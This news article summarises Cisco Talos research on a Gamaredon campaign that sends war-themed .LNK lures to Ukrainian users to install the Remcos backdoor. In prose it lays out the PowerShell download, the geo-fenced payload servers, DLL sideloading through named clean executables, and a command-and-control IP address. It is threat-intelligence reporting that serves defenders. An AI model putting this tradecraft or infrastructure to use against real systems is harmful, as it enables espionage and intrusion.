do son 
A new targeted malware campaign linked to the Russian state-aligned group Gamaredon is exploiting Windows shortcut (.LNK) files to distribute the Remcos backdoor, according to research published by Cisco Talos. Active since at least November 2024, the operation has zeroed in on users in Ukraine, blending war-themed lures, stealthy delivery mechanisms, and sophisticated infrastructure control to maintain access in compromised environments.
Gamaredon, also known as Primitive Bear, continues to exploit the geopolitical chaos surrounding the Russia-Ukraine conflict by deploying malicious attachments disguised as sensitive military documents. These .lnk files are embedded in ZIP archives and use filenames referencing troop movements, Ukrainian agents, and combat logistics.
“The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns,” notes Talos. “We can see some of the files use names of Russian or Ukrainian agents, as well as names alluding to troop movements.”
When executed, the .lnk file launches a PowerShell script that attempts to download a second-stage ZIP archive from geo-fenced servers in Russia and Germany. These servers are programmed to deliver payloads only if the victim’s system appears to be within Ukrainian IP ranges, a tactic designed to thwart global detection.
“All of them return HTTP error 403… Gamaredon is known to restrict access to their payload servers only to victims located in Ukraine.”
Once downloaded, the ZIP archive is extracted to %TEMP%, and a clean-looking executable (e.g., TivoDiag.exe) sideloads a malicious DLL such as mindclient.dll. This DLL decrypts and executes the Remcos backdoor, a remote access tool capable of full system control.
Talos observed DLL sideloading abuse using a wide range of legitimate-looking binaries, including: DPMHelper.exe, TiVoDiag.exe, palemoon.exe, Mp3tag.exe, steamerrorreporter64.exe
“The binary which is executed is a clean application which in turn loads the malicious DLL… this file is actually a malicious loader which decrypts and executes the final Remcos payload.”
The final payload is injected into Explorer.exe and connects to a command-and-control (C2) server at 146.185.233.96:6856.
Talos analysts traced the infrastructure to GTHost and HyperHosting, with over a dozen servers handling payload distribution and C2. Interestingly, the .lnk files’ metadata revealed they were all created on just two machines, suggesting a centralized toolchain—a Gamaredon hallmark.
“The ones used in this campaign were previously seen by Talos in incidents related to this threat group.”
Gamaredon has a long history of using custom scripts and espionage malware to target Ukrainian entities, often with low operational security, but highly effective delivery. While Remcos is an off-the-shelf RAT, its use here demonstrates the group’s evolving tradecraft, combining LNK social engineering, PowerShell evasion, DLL sideloading, and geo-fenced payload delivery.
Related Posts:
- Gamaredon APT Deploys Two Russian Android Spyware Families: BoneSpy and PlainGnome
- GamaCopy: A New Cyber Espionage Group Imitating Gamaredon to Target Russia
- Remcos RAT: Hackers Target Ukrainian Government with Surveillance Tool
- Beware of Word: Remcos RAT Lurks in Malicious Documents
- Tax Extension Malware Campaign Exploits Trusted GitHub Repositories to Deliver Remcos RAT
